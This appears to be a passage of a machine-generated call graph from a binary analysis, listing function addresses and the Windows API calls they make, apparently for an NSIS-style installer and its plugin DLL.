4816->4823 4831 403f5e 4816->4831 4817->4805 4817->4816 4819 40640a 17 API calls 4819->4827 4820->4822 4820->4831 4822->4812 4824 403f81 4823->4824 4825 403f96 4823->4825 4828 40140b 2 API calls 4824->4828 4829 40140b 2 API calls 4825->4829 4826 403f94 4826->4812 4827->4805 4827->4810 4827->4811 4827->4819 4830 40435f 18 API calls 4827->4830 4849 40422a DestroyWindow 4827->4849 4859 40435f 4827->4859 4828->4831 4832 403f9d 4829->4832 4830->4827 4865 404338 4831->4865 4832->4812 4832->4831 4834 404111 GetDlgItem 4835 404126 4834->4835 4836 40412e ShowWindow KiUserCallbackDispatcher 4834->4836 4835->4836 4862 404381 EnableWindow 4836->4862 4838 404158 EnableWindow 4843 40416c 4838->4843 4839 404171 GetSystemMenu EnableMenuItem SendMessageW 4840 4041a1 SendMessageW 4839->4840 4839->4843 4840->4843 4842 403e67 18 API calls 4842->4843 4843->4839 4843->4842 4863 404394 SendMessageW 4843->4863 4864 4063e8 lstrcpynW 4843->4864 4845 4041d0 lstrlenW 4846 40640a 17 API calls 4845->4846 4847 4041e6 SetWindowTextW 4846->4847 4848 401389 2 API calls 4847->4848 4848->4827 4849->4806 4850 404244 CreateDialogParamW 4849->4850 4850->4806 4851 404277 4850->4851 4852 40435f 18 API calls 4851->4852 4853 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4852->4853 4854 401389 2 API calls 4853->4854 4855 4042c8 4854->4855 4855->4805 4856 4042d0 ShowWindow 4855->4856 4857 4043ab SendMessageW 4856->4857 4858 4042e8 4857->4858 4858->4806 4860 40640a 17 API calls 4859->4860 4861 40436a SetDlgItemTextW 4860->4861 4861->4834 4862->4838 4863->4843 4864->4845 4866 404345 SendMessageW 4865->4866 4867 40433f 4865->4867 4866->4826 4867->4866 4869 404489 4868->4869 4870 4043de GetWindowLongW 4868->4870 4869->4805 4870->4869 4871 4043f3 4870->4871 4871->4869 4872 404420 GetSysColor 4871->4872 4873 404423 4871->4873 4872->4873 4874 404433 SetBkMode 4873->4874 4875 404429 SetTextColor 4873->4875 4876 404451 4874->4876 4877 40444b GetSysColor 4874->4877 4875->4874 4878 404462 4876->4878 4879 404458 SetBkColor 4876->4879 4877->4876 4878->4869 4880 404475 DeleteObject 4878->4880 4881 40447c CreateBrushIndirect 4878->4881 4879->4878 4880->4881 4881->4869 5622 401f06 5623 402c41 17 API calls 5622->5623 5624 401f0c 5623->5624 5625 405450 24 API calls 5624->5625 5626 401f16 5625->5626 5627 4059d1 2 API calls 5626->5627 5628 401f1c 5627->5628 5629 401f3f CloseHandle 5628->5629 5631 406873 5 API calls 5628->5631 5632 40288b 5628->5632 5629->5632 5633 401f31 5631->5633 5633->5629 5635 40632f wsprintfW 5633->5635 5635->5629 5636 404809 5637 404819 5636->5637 5638 40483f 5636->5638 5640 40435f 18 API calls 5637->5640 5639 4043c6 8 API calls 5638->5639 5641 40484b 5639->5641 5642 404826 SetDlgItemTextW 5640->5642 5642->5638 5643 40190c 5644 401943 5643->5644 5645 402c41 17 API calls 5644->5645 5646 401948 5645->5646 5647 405afa 67 API calls 5646->5647 5648 401951 5647->5648 5649 40230c 5650 402314 5649->5650 5651 40231a 5649->5651 5652 402c41 17 API calls 5650->5652 5653 402328 5651->5653 5654 402c41 17 API calls 5651->5654 5652->5651 5655 402336 5653->5655 5656 402c41 17 API calls 5653->5656 5654->5653 5657 402c41 17 API calls 5655->5657 5656->5655 5658 40233f WritePrivateProfileStringW 5657->5658 5659 401f8c 5660 402c41 17 API calls 5659->5660 5661 401f93 5660->5661 5662 4067c2 5 API calls 5661->5662 5663 401fa2 5662->5663 5664 401fbe GlobalAlloc 5663->5664 5666 402026 5663->5666 5665 401fd2 5664->5665 5664->5666 5667 4067c2 5 API calls 5665->5667 5668 401fd9 5667->5668 5669 4067c2 5 API calls 5668->5669 5670 401fe3 5669->5670 5670->5666 5674 40632f wsprintfW 5670->5674 5672 402018 5675 40632f wsprintfW 5672->5675 5674->5672 5675->5666 4982 40238e 4983 4023c1 4982->4983 4984 402396 4982->4984 4985 402c41 17 API calls 4983->4985 4986 402c81 17 API calls 4984->4986 4987 4023c8 4985->4987 4988 40239d 4986->4988 4994 402cff 4987->4994 4989 4023a7 4988->4989 4993 4023d5 4988->4993 4991 402c41 17 API calls 4989->4991 4992 4023ae RegDeleteValueW RegCloseKey 4991->4992 4992->4993 4995 402d0c 4994->4995 4996 402d13 4994->4996 4995->4993 4996->4995 4998 402d44 4996->4998 4999 406255 RegOpenKeyExW 4998->4999 5000 402d72 4999->5000 5001 402d76 5000->5001 5002 402dec 5000->5002 5003 402d98 RegEnumKeyW 5001->5003 5004 402daf RegCloseKey 5001->5004 5005 402dd0 RegCloseKey 5001->5005 5007 402d44 6 API calls 5001->5007 5002->4995 5003->5001 5003->5004 5006 4067c2 5 API calls 5004->5006 5005->5002 5008 402dbf 5006->5008 5007->5001 5009 402de0 RegDeleteKeyW 5008->5009 5010 402dc3 5008->5010 5009->5002 5010->5002 5676 40190f 5677 402c41 17 API calls 5676->5677 5678 401916 5677->5678 5679 405a4e MessageBoxIndirectW 5678->5679 5680 40191f 5679->5680 5681 40558f 5682 4055b0 GetDlgItem GetDlgItem GetDlgItem 5681->5682 5683 405739 5681->5683 5726 404394 SendMessageW 5682->5726 5685 405742 GetDlgItem CreateThread CloseHandle 5683->5685 5686 40576a 5683->5686 5685->5686 5687 405795 5686->5687 5689 405781 ShowWindow ShowWindow 5686->5689 5690 4057ba 5686->5690 5691 4057f5 5687->5691 5693 4057a9 5687->5693 5694 4057cf ShowWindow 5687->5694 5688 405620 5696 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5688->5696 5728 404394 SendMessageW 5689->5728 5695 4043c6 8 API calls 5690->5695 5691->5690 5699 405803 SendMessageW 5691->5699 5700 404338 SendMessageW 5693->5700 5701 4057e1 5694->5701 5702 4057ef 5694->5702 5705 4057c8 5695->5705 5697 405695 5696->5697 5698 405679 SendMessageW SendMessageW 5696->5698 5703 4056a8 5697->5703 5704 40569a SendMessageW 5697->5704 5698->5697 5699->5705 5706 40581c CreatePopupMenu 5699->5706 5700->5690 5707 405450 24 API calls 5701->5707 5708 404338 SendMessageW 5702->5708 5710 40435f 18 API calls 5703->5710 5704->5703 5709 40640a 17 API calls 5706->5709 5707->5702 5708->5691 5711 40582c AppendMenuW 5709->5711 5712 4056b8 5710->5712 5713 405849 GetWindowRect 5711->5713 5714 40585c TrackPopupMenu 5711->5714 5715 4056c1 ShowWindow 5712->5715 5716 4056f5 GetDlgItem SendMessageW 5712->5716 5713->5714 5714->5705 5717 405877 5714->5717 5718 4056e4 5715->5718 5719 4056d7 ShowWindow 5715->5719 5716->5705 5720 40571c SendMessageW SendMessageW 5716->5720 5721 405893 SendMessageW 5717->5721 5727 404394 SendMessageW 5718->5727 5719->5718 5720->5705 5721->5721 5722 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5721->5722 5724 4058d5 SendMessageW 5722->5724 5724->5724 5725 4058fe GlobalUnlock SetClipboardData CloseClipboard 5724->5725 5725->5705 5726->5688 5727->5716 5728->5687 5729 401491 5730 405450 24 API calls 5729->5730 5731 401498 5730->5731 5739 401d14 5740 402c1f 17 API calls 5739->5740 5741 401d1b 5740->5741 5742 402c1f 17 API calls 5741->5742 5743 401d27 GetDlgItem 5742->5743 5744 402592 5743->5744 5745 404495 lstrcpynW lstrlenW 5746 403a96 5747 403aa1 5746->5747 5748 403aa5 5747->5748 5749 403aa8 GlobalAlloc 5747->5749 5749->5748 5750 738e1058 5752 738e1074 5750->5752 5751 738e10dd 5752->5751 5753 738e1092 5752->5753 5754 738e1516 GlobalFree 5752->5754 5755 738e1516 GlobalFree 5753->5755 5754->5753 5756 738e10a2 5755->5756 5757 738e10a9 GlobalSize 5756->5757 5758 738e10b2 5756->5758 5757->5758 5759 738e10c7 5758->5759 5760 738e10b6 GlobalAlloc 5758->5760 5762 738e10d2 GlobalFree 5759->5762 5761 738e153d 3 API calls 5760->5761 5761->5759 5762->5751 5763 738e18d9 5765 738e18fc 5763->5765 5764 738e1943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5767 738e1272 2 API calls 5764->5767 5765->5764 5766 738e1931 GlobalFree 5765->5766 5766->5764 5768 738e1ace GlobalFree GlobalFree 5767->5768 5769 402598 5770 4025c7 5769->5770 5771 4025ac 5769->5771 5773 4025fb 5770->5773 5774 4025cc 5770->5774 5772 402c1f 17 API calls 5771->5772 5781 4025b3 5772->5781 5776 402c41 17 API calls 5773->5776 5775 402c41 17 API calls 5774->5775 5777 4025d3 WideCharToMultiByte lstrlenA 5775->5777 5778 402602 lstrlenW 5776->5778 5777->5781 5778->5781 5779 40262f 5780 402645 5779->5780 5782 405f90 WriteFile 5779->5782 5781->5779 5781->5780 5783 405fbf 5 API calls 5781->5783 5782->5780 5783->5779 5784 738e2c57 5785 738e2c6f 5784->5785 5786 738e158f 2 API calls 5785->5786 5787 738e2c8a 5786->5787 5788 738e16d4 5789 738e1703 5788->5789 5790 738e1b5f 22 API calls 5789->5790 5791 738e170a 5790->5791 5792 738e171d 5791->5792 5793 738e1711 5791->5793 5795 738e1727 5792->5795 5796 738e1744 5792->5796 5794 738e1272 2 API calls 5793->5794 5802 738e171b 5794->5802 5799 738e153d 3 API calls 5795->5799 5797 738e176e 5796->5797 5798 738e174a 5796->5798 5801 738e153d 3 API calls 5797->5801 5800 738e15b4 3 API calls 5798->5800 5803 738e172c 5799->5803 5804 738e174f 5800->5804 5801->5802 5805 738e15b4 3 API calls 5803->5805 5806 738e1272 2 API calls 5804->5806 5807 738e1732 5805->5807 5808 738e1755 GlobalFree 5806->5808 5809 738e1272 2 API calls 5807->5809 5808->5802 5811 738e1769 GlobalFree 5808->5811 5810 738e1738 GlobalFree 5809->5810 5810->5802 5811->5802 5812 40451e 5813 404536 5812->5813 5816 404650 5812->5816 5817 40435f 18 API calls 5813->5817 5814 4046ba 5815 4046c4 GetDlgItem 5814->5815 5818 404784 5814->5818 5819 404745 5815->5819 5820 4046de 5815->5820 5816->5814 5816->5818 5821 40468b GetDlgItem SendMessageW 5816->5821 5822 40459d 5817->5822 5823 4043c6 8 API calls 5818->5823 5819->5818 5824 404757 5819->5824 5820->5819 5828 404704 SendMessageW LoadCursorW SetCursor 5820->5828 5845 404381 EnableWindow 5821->5845 5826 40435f 18 API calls 5822->5826 5827 40477f 5823->5827 5829 40476d 5824->5829 5830 40475d SendMessageW 5824->5830 5832 4045aa CheckDlgButton 5826->5832 5846 4047cd 5828->5846 5829->5827 5835 404773 SendMessageW 5829->5835 5830->5829 5831 4046b5 5836 4047a9 SendMessageW 5831->5836 5843 404381 EnableWindow 5832->5843 5835->5827 5836->5814 5838 4045c8 GetDlgItem 5844 404394 SendMessageW 5838->5844 5840 4045de SendMessageW 5841 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5840->5841 5842 4045fb GetSysColor 5840->5842 5841->5827 5842->5841 5843->5838 5844->5840 5845->5831 5849 405a14 ShellExecuteExW 5846->5849 5848 404733 LoadCursorW SetCursor 5848->5819 5849->5848 5850 40149e 5851 4014ac PostQuitMessage 5850->5851 5852 4022f7 5850->5852 5851->5852 5853 401c1f 5854 402c1f 17 API calls 5853->5854 5855 401c26 5854->5855 5856 402c1f 17 API calls 5855->5856 5857 401c33 5856->5857 5858 401c48 5857->5858 5859 402c41 17 API calls 5857->5859 5862 402c41 17 API calls 5858->5862 5865 401c58 5858->5865 5859->5858 5860 401c63 5863 402c1f 17 API calls 5860->5863 5861 401caf 5864 402c41 17 API calls 5861->5864 5862->5865 5866 401c68 5863->5866 5867 401cb4 5864->5867 5865->5860 5865->5861 5868 402c1f 17 API calls 5866->5868 5869 402c41 17 API calls 5867->5869 5870 401c74 5868->5870 5871 401cbd FindWindowExW 5869->5871 5872 401c81 SendMessageTimeoutW 5870->5872 5873 401c9f SendMessageW 5870->5873 5874 401cdf 5871->5874 5872->5874 5873->5874 5875 402aa0 SendMessageW 5876 402ac5 5875->5876 5877 402aba InvalidateRect 5875->5877 5877->5876 5878 402821 5879 402827 5878->5879 5880 402ac5 5879->5880 5881 40282f FindClose 5879->5881 5881->5880 5882 738e166d 5883 738e1516 GlobalFree 5882->5883 5885 738e1685 5883->5885 5884 738e16cb GlobalFree 5885->5884 5886 738e16a0 5885->5886 5887 738e16b7 VirtualFree 5885->5887 5886->5884 5887->5884 5888 4015a3 5889 402c41 17 API calls 5888->5889 5890 4015aa SetFileAttributesW 5889->5890 5891 4015bc 5890->5891 4544 4034a5 SetErrorMode GetVersion 4545 4034e4 4544->4545 4546 4034ea 4544->4546 4547 4067c2 5 API calls 4545->4547 4548 406752 3 API calls 4546->4548 4547->4546 4549 403500 lstrlenA 4548->4549 4549->4546 4550 403510 4549->4550 4551 4067c2 5 API calls 4550->4551 4552 403517 4551->4552 4553 4067c2 5 API calls 4552->4553 4554 40351e 4553->4554 4555 4067c2 5 API calls 4554->4555 4556 40352a #17 OleInitialize SHGetFileInfoW 4555->4556 4634 4063e8 lstrcpynW 4556->4634 4559 403576 GetCommandLineW 4635 4063e8 lstrcpynW 4559->4635 4561 403588 4562 405cea CharNextW 4561->4562 4563 4035ad CharNextW 4562->4563 4564 4036d7 GetTempPathW 4563->4564 4572 4035c6 4563->4572 4636 403474 4564->4636 4566 4036ef 4567 4036f3 GetWindowsDirectoryW lstrcatW 4566->4567 4568 403749 DeleteFileW 4566->4568 4569 403474 12 API calls 4567->4569 4646 402f30 GetTickCount GetModuleFileNameW 4568->4646 4573 40370f 4569->4573 4570 405cea CharNextW 4570->4572 4572->4570 4579 4036c2 4572->4579 4580 4036c0 4572->4580 4573->4568 4575 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4573->4575 4574 40375d 4576 403810 4574->4576 4581 403800 4574->4581 4585 405cea CharNextW 4574->4585 4578 403474 12 API calls 4575->4578 4735 4039e6 4576->4735 4583 403741 4578->4583 4732 4063e8 lstrcpynW 4579->4732 4580->4564 4676 403ad8 4581->4676 4583->4568 4583->4576 4598 40377c 4585->4598 4587 40394a 4590 403952 GetCurrentProcess OpenProcessToken 4587->4590 4591 4039ce ExitProcess 4587->4591 4588 40382a 4744 405a4e 4588->4744 4596 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4590->4596 4597 40399e 4590->4597 4594 403840 4600 4059b9 5 API calls 4594->4600 4595 4037da 4599 405dc5 18 API calls 4595->4599 4596->4597 4601 4067c2 5 API calls 4597->4601 4598->4594 4598->4595 4602 4037e6 4599->4602 4603 403845 lstrcatW 4600->4603 4604 4039a5 4601->4604 4602->4576 4733 4063e8 lstrcpynW 4602->4733 4605 403861 lstrcatW lstrcmpiW 4603->4605 4606 403856 lstrcatW 4603->4606 4607 4039ba ExitWindowsEx 4604->4607 4608 4039c7 4604->4608 4605->4576 4610 40387d 4605->4610 4606->4605 4607->4591 4607->4608 4611 40140b 2 API calls 4608->4611 4613 403882 4610->4613 4614 403889 4610->4614 4611->4591 4612 4037f5 4734 4063e8 lstrcpynW 4612->4734 4616 40591f 4 API calls 4613->4616 4617 40599c 2 API calls 4614->4617 4619 403887 4616->4619 4618 40388e SetCurrentDirectoryW 4617->4618 4620 4038a9 4618->4620 4621 40389e 4618->4621 4619->4618 4749 4063e8 lstrcpynW 4620->4749 4748 4063e8 lstrcpynW 4621->4748 4624 40640a 17 API calls 4625 4038e8 DeleteFileW 4624->4625 4626 4038f5 CopyFileW 4625->4626 4631 4038b7 4625->4631 4626->4631 4627 40393e 4628 4061ae 36 API calls 4627->4628 4628->4576 4629 4061ae 36 API calls 4629->4631 4630 40640a 17 API calls 4630->4631 4631->4624 4631->4627 4631->4629 4631->4630 4633 403929 CloseHandle 4631->4633 4750 4059d1 CreateProcessW 4631->4750 4633->4631 4634->4559 4635->4561 4637 40667c 5 API calls 4636->4637 4639 403480 4637->4639 4638 40348a 4638->4566 4639->4638 4640 405cbd 3 API calls 4639->4640 4641 403492 4640->4641 4642 40599c 2 API calls 4641->4642 4643 403498 4642->4643 4753 405f0d 4643->4753 4757 405ede GetFileAttributesW CreateFileW 4646->4757 4648 402f73 4664 402f80 4648->4664 4758 4063e8 lstrcpynW 4648->4758 4650 402f96 4651 405d09 2 API calls 4650->4651 4652 402f9c 4651->4652 4759 4063e8 lstrcpynW 4652->4759 4654 402fa7 GetFileSize 4655 4030a8 4654->4655 4674 402fbe 4654->4674 4656 402e8e 32 API calls 4655->4656 4657 4030af 4656->4657 4659 4030eb GlobalAlloc 4657->4659 4657->4664 4761 40345d SetFilePointer 4657->4761 4658 403447 ReadFile 4658->4674 4663 403102 4659->4663 4660 403143 4661 402e8e 32 API calls 4660->4661 4661->4664 4666 405f0d 2 API calls 4663->4666 4664->4574 4665 4030cc 4667 403447 ReadFile 4665->4667 4669 403113 CreateFileW 4666->4669 4670 4030d7 4667->4670 4668 402e8e 32 API calls 4668->4674 4669->4664 4671 40314d 4669->4671 4670->4659 4670->4664 4760 40345d SetFilePointer 4671->4760 4673 40315b 4675 4031d6 44 API calls 4673->4675 4674->4655 4674->4658 4674->4660 4674->4664 4674->4668 4675->4664 4677 4067c2 5 API calls 4676->4677 4678 403aec 4677->4678 4679 403af2 4678->4679 4680 403b04 4678->4680 4770 40632f wsprintfW 4679->4770 4681 4062b6 3 API calls 4680->4681 4682 403b34 4681->4682 4684 403b53 lstrcatW 4682->4684 4686 4062b6 3 API calls 4682->4686 4685 403b02 4684->4685 4762 403dae 4685->4762 4686->4684 4689 405dc5 18 API calls 4690 403b85 4689->4690 4691 403c19 4690->4691 4694 4062b6 3 API calls 4690->4694 4692 405dc5 18 API calls 4691->4692 4693 403c1f 4692->4693 4696 403c2f LoadImageW 4693->4696 4697 40640a 17 API calls 4693->4697 4695 403bb7 4694->4695 4695->4691 4700 403bd8 lstrlenW 4695->4700 4703 405cea CharNextW 4695->4703 4698 403cd5 4696->4698 4699 403c56 RegisterClassW 4696->4699 4697->4696 4702 40140b 2 API calls 4698->4702 4701 403c8c SystemParametersInfoW CreateWindowExW 4699->4701 4731 403cdf 4699->4731 4704 403be6 lstrcmpiW 4700->4704 4705 403c0c 4700->4705 4701->4698 4706 403cdb 4702->4706 4707 403bd5 4703->4707 4704->4705 4708 403bf6 GetFileAttributesW 4704->4708 4709 405cbd 3 API calls 4705->4709 4711 403dae 18 API calls 4706->4711 4706->4731 4707->4700 4710 403c02 4708->4710 4712 403c12 4709->4712 4710->4705 4713 405d09 2 API calls 4710->4713 4714 403cec 4711->4714 4771 4063e8 lstrcpynW 4712->4771 4713->4705 4716 403cf8 ShowWindow 4714->4716 4717 403d7b 4714->4717 4719 406752 3 API calls 4716->4719 4772 405523 OleInitialize 4717->4772 4720 403d10 4719->4720 4722 403d1e GetClassInfoW 4720->4722 4725 406752 3 API calls 4720->4725 4721 403d81 4723 403d85 4721->4723 4724 403d9d 4721->4724 4727 403d32 GetClassInfoW RegisterClassW 4722->4727 4728 403d48 DialogBoxParamW 4722->4728 4730 40140b 2 API calls 4723->4730 4723->4731 4726 40140b 2 API calls 4724->4726 4725->4722 4726->4731 4727->4728 4729 40140b 2 API calls 4728->4729 4729->4731 4730->4731 4731->4576 4732->4580 4733->4612 4734->4581 4736 403a01 4735->4736 4737 4039f7 CloseHandle 4735->4737 4738 403a15 4736->4738 4739 403a0b CloseHandle 4736->4739 4737->4736 4783 403a43 4738->4783 4739->4738 4742 405afa 67 API calls 4743 403819 OleUninitialize 4742->4743 4743->4587 4743->4588 4745 405a63 4744->4745 4746 403838 ExitProcess 4745->4746 4747 405a77 MessageBoxIndirectW 4745->4747 4747->4746 4748->4620 4749->4631 4751 405a10 4750->4751 4752 405a04 CloseHandle 4750->4752 4751->4631 4752->4751 4754 405f1a GetTickCount GetTempFileNameW 4753->4754 4755 405f50 4754->4755 4756 4034a3 4754->4756 4755->4754 4755->4756 4756->4566 4757->4648 4758->4650 4759->4654 4760->4673 4761->4665 4763 403dc2 4762->4763 4779 40632f wsprintfW 4763->4779 4765 403e33 4780 403e67 4765->4780 4767 403b63 4767->4689 4768 403e38 4768->4767 4769 40640a 17 API calls 4768->4769 4769->4768 4770->4685 4771->4691 4773 4043ab SendMessageW 4772->4773 4774 405546 4773->4774 4777 40556d 4774->4777 4778 401389 2 API calls 4774->4778 4775 4043ab SendMessageW 4776 40557f OleUninitialize 4775->4776 4776->4721 4777->4775 4778->4774 4779->4765 4781 40640a 17 API calls 4780->4781 4782 403e75 SetWindowTextW 4781->4782 4782->4768 4784 403a51 4783->4784 4785 403a56 FreeLibrary GlobalFree 4784->4785 4786 403a1a 4784->4786 4785->4785 4785->4786 4786->4742 5892 404ba6 5893 404bd2 5892->5893 5894 404bb6 5892->5894 5896 404c05 5893->5896 5897 404bd8 SHGetPathFromIDListW 5893->5897 5903 405a32 GetDlgItemTextW 5894->5903 5899 404bef SendMessageW 5897->5899 5900 404be8 5897->5900 5898 404bc3 SendMessageW 5898->5893 5899->5896 5902 40140b 2 API calls 5900->5902 5902->5899 5903->5898 5918 4029a8 5919 402c1f 17 API calls 5918->5919 5920 4029ae 5919->5920 5921 4029d5 5920->5921 5922 4029ee 5920->5922 5928 40288b 5920->5928 5923 4029da 5921->5923 5924 4029eb 5921->5924 5925 402a08 5922->5925 5926 4029f8 5922->5926 5932 4063e8 lstrcpynW 5923->5932 5924->5928 5933 40632f wsprintfW 5924->5933 5927 40640a 17 API calls 5925->5927 5929 402c1f 17 API calls 5926->5929 5927->5924 5929->5924 5932->5928 5933->5928 5934 4028ad 5935 402c41 17 API calls 5934->5935 5936 4028bb 5935->5936 5937 4028d1 5936->5937 5938 402c41 17 API calls 5936->5938 5939 405eb9 2 API calls 5937->5939 5938->5937 5940 4028d7 5939->5940 5962 405ede GetFileAttributesW CreateFileW 5940->5962 5942 4028e4 5943 4028f0 GlobalAlloc 5942->5943 5944 402987 5942->5944 5947 402909 5943->5947 5948 40297e CloseHandle 5943->5948 5945 4029a2 5944->5945 5946 40298f DeleteFileW 5944->5946 5946->5945 5963 40345d SetFilePointer 5947->5963 5948->5944 5950 40290f 5951 403447 ReadFile 5950->5951 5952 402918 GlobalAlloc 5951->5952 5953 402928 5952->5953 5954 40295c 5952->5954 5955 4031d6 44 API calls 5953->5955 5956 405f90 WriteFile 5954->5956 5961 402935 5955->5961 5957 402968 GlobalFree 5956->5957 5958 4031d6 44 API calls 5957->5958 5960 40297b 5958->5960 5959 402953 GlobalFree 5959->5954 5960->5948 5961->5959 5962->5942 5963->5950 5964 738e10e1 5973 738e1111 5964->5973 5965 738e11d8 GlobalFree 5966 738e12ba 2 API calls 5966->5973 5967 738e11d3 5967->5965 5968 738e11f8 GlobalFree 5968->5973 5969 738e1272 2 API calls 5972 738e11c4 GlobalFree 5969->5972 5970 738e1164 GlobalAlloc 5970->5973 5971 738e12e1 lstrcpyW 5971->5973 5972->5973 5973->5965 5973->5966 5973->5967 5973->5968 5973->5969 5973->5970 5973->5971 5973->5972 5981 401a30 5982 402c41 17 API calls 5981->5982 5983 401a39 ExpandEnvironmentStringsW 5982->5983 5984 401a4d 5983->5984 5986 401a60 5983->5986 5985 401a52 lstrcmpW 5984->5985 5984->5986 5985->5986 5062 402032 5063 402044 5062->5063 5064 4020f6 5062->5064 5065 402c41 17 API calls 5063->5065 5066 401423 24 API calls 5064->5066 5067 40204b 5065->5067 5068 402250 5066->5068 5069 402c41 17 API calls 5067->5069 5070 402054 5069->5070 5071 40206a LoadLibraryExW 5070->5071 5072 40205c GetModuleHandleW 5070->5072 5071->5064 5073 40207b 5071->5073 5072->5071 5072->5073 5085 406831 WideCharToMultiByte 5073->5085 5076 4020c5 5078 405450 24 API calls 5076->5078 5077 40208c 5079 402094 5077->5079 5080 4020ab 5077->5080 5081 40209c 5078->5081 5082 401423 24 API calls 5079->5082 5088 738e1777 5080->5088 5081->5068 5083 4020e8 FreeLibrary 5081->5083 5082->5081 5083->5068 5086 40685b GetProcAddress 5085->5086 5087 402086 5085->5087 5086->5087 5087->5076 5087->5077 5089 738e17aa 5088->5089 5130 738e1b5f 5089->5130 5091 738e17b1 5092 738e18d6 5091->5092 5093 738e17c9 5091->5093 5094 738e17c2 5091->5094 5092->5081 5164 738e2394 5093->5164 5180 738e2352 5094->5180 5099 738e180f 5193 738e2569 5099->5193 5100 738e182d 5101 738e187e 5100->5101 5102 738e1833 5100->5102 5109 738e2569 10 API calls 5101->5109 5212 738e15c6 5102->5212 5103 738e17f8 5115 738e17ee 5103->5115 5190 738e2d37 5103->5190 5105 738e17e5 5105->5115 5174 738e2aac 5105->5174 5106 738e17df 5106->5105 5111 738e17f0 5106->5111 5116 738e186f 5109->5116 5110 738e1815 5204 738e15b4 5110->5204 5184 738e2724 5111->5184 5115->5099 5115->5100 5121 738e18c5 5116->5121 5218 738e252c 5116->5218 5118 738e17f6 5118->5115 5119 738e2569 10 API calls 5119->5116 5121->5092 5123 738e18cf GlobalFree 5121->5123 5123->5092 5127 738e18b1 5127->5121 5222 738e153d wsprintfW 5127->5222 5129 738e18aa FreeLibrary 5129->5127 5225 738e121b GlobalAlloc 5130->5225 5132 738e1b83 5226 738e121b GlobalAlloc 5132->5226 5134 738e1da9 GlobalFree GlobalFree GlobalFree 5135 738e1dc6 5134->5135 5151 738e1e10 5134->5151 5137 738e2192 5135->5137 5145 738e1ddb 5135->5145 5135->5151 5136 738e1c64 GlobalAlloc 5160 738e1b8e 5136->5160 5138 738e21b4 GetModuleHandleW 5137->5138 5137->5151 5141 738e21da 5138->5141 5142 738e21c5 LoadLibraryW 5138->5142 5139 738e1caf lstrcpyW 5144 738e1cb9 lstrcpyW 5139->5144 5140 738e1ccd GlobalFree 5140->5160 5233 738e161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5141->5233 5142->5141 5142->5151 5144->5160 5145->5151 5229 738e122c 5145->5229 5146 738e222c 5149 738e2239 lstrlenW 5146->5149 5146->5151 5147 738e20ec 5147->5151 5158 738e2134 lstrcpyW 5147->5158 5234 738e161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5149->5234 5150 738e2064 5232 738e121b GlobalAlloc 5150->5232 5151->5091 5152 738e21ec 5152->5146 5162 738e2216 GetProcAddress 5152->5162 5155 738e2253 5155->5151 5156 738e1d0b 5156->5160 5227 738e158f GlobalSize GlobalAlloc 5156->5227 5157 738e1fa5 GlobalFree 5157->5160 5158->5151 5160->5134 5160->5136 5160->5139 5160->5140 5160->5144 5160->5147 5160->5150 5160->5151 5160->5156 5160->5157 5161 738e122c 2 API calls 5160->5161 5161->5160 5162->5146 5163 738e206d 5163->5091 5165 738e23ac 5164->5165 5167 738e24d5 GlobalFree 5165->5167 5169 738e247f GlobalAlloc CLSIDFromString 5165->5169 5170 738e2454 GlobalAlloc WideCharToMultiByte 5165->5170 5171 738e122c GlobalAlloc lstrcpynW 5165->5171 5173 738e249e 5165->5173 5236 738e12ba 5165->5236 5167->5165 5168 738e17cf 5167->5168 5168->5103 5168->5106 5168->5115 5169->5167 5170->5167 5171->5165 5173->5167 5240 738e26b8 5173->5240 5176 738e2abe 5174->5176 5175 738e2b63 EnumWindows 5179 738e2b81 5175->5179 5176->5175 5178 738e2c4d 5178->5115 5243 738e2a56 5179->5243 5181 738e2367 5180->5181 5182 738e2372 GlobalAlloc 5181->5182 5183 738e17c8 5181->5183 5182->5181 5183->5093 5188 738e2754 5184->5188 5185 738e27ef GlobalAlloc 5189 738e2812 5185->5189 5186 738e2802 5187 738e2808 GlobalSize 5186->5187 5186->5189 5187->5189 5188->5185 5188->5186 5189->5118 5192 738e2d42 5190->5192 5191 738e2d82 GlobalFree 5192->5191 5247 738e121b GlobalAlloc 5193->5247 5195 738e260e StringFromGUID2 5202 738e2573 5195->5202 5196 738e261f lstrcpynW 5196->5202 5197 738e25ec MultiByteToWideChar 5197->5202 5198 738e2632 wsprintfW 5198->5202 5199 738e2656 GlobalFree 5199->5202 5200 738e268b GlobalFree 5200->5110 5201 738e1272 2 API calls 5201->5202 5202->5195 5202->5196 5202->5197 5202->5198 5202->5199 5202->5200 5202->5201 5248 738e12e1 5202->5248 5252 738e121b GlobalAlloc 5204->5252 5206 738e15b9 5207 738e15c6 2 API calls 5206->5207 5208 738e15c3 5207->5208 5209 738e1272 5208->5209 5210 738e127b GlobalAlloc lstrcpynW 5209->5210 5211 738e12b5 GlobalFree 5209->5211 5210->5211 5211->5116 5213 738e15ff lstrcpyW 5212->5213 5214 738e15d2 wsprintfW 5212->5214 5217 738e1618 5213->5217 5214->5217 5217->5119 5219 738e253a 5218->5219 5220 738e1891 5218->5220 5219->5220 5221 738e2556 GlobalFree 5219->5221 5220->5127 5220->5129 5221->5219 5223 738e1272 2 API calls 5222->5223 5224 738e155e 5223->5224 5224->5121 5225->5132 5226->5160 5228 738e15ad 5227->5228 5228->5156 5235 738e121b GlobalAlloc 5229->5235 5231 738e123b lstrcpynW 5231->5151 5232->5163 5233->5152 5234->5155 5235->5231 5237 738e12c1 5236->5237 5238 738e122c 2 API calls 5237->5238 5239 738e12df 5238->5239 5239->5165 5241 738e271c 5240->5241 5242 738e26c6 VirtualAlloc 5240->5242 5241->5173 5242->5241 5244 738e2a61 5243->5244 5245 738e2a66 GetLastError 5244->5245 5246 738e2a71 5244->5246 5245->5246 5246->5178 5247->5202 5249 738e130c 5248->5249 5250 738e12ea 5248->5250 5249->5202 5250->5249 5251 738e12f0 lstrcpyW 5250->5251 5251->5249 5252->5206 5992 738e22fd 5993 738e2367 5992->5993 5994 738e2372 GlobalAlloc 5993->5994 5995 738e2391 5993->5995 5994->5993 5996 402a35 5997 402c1f 17 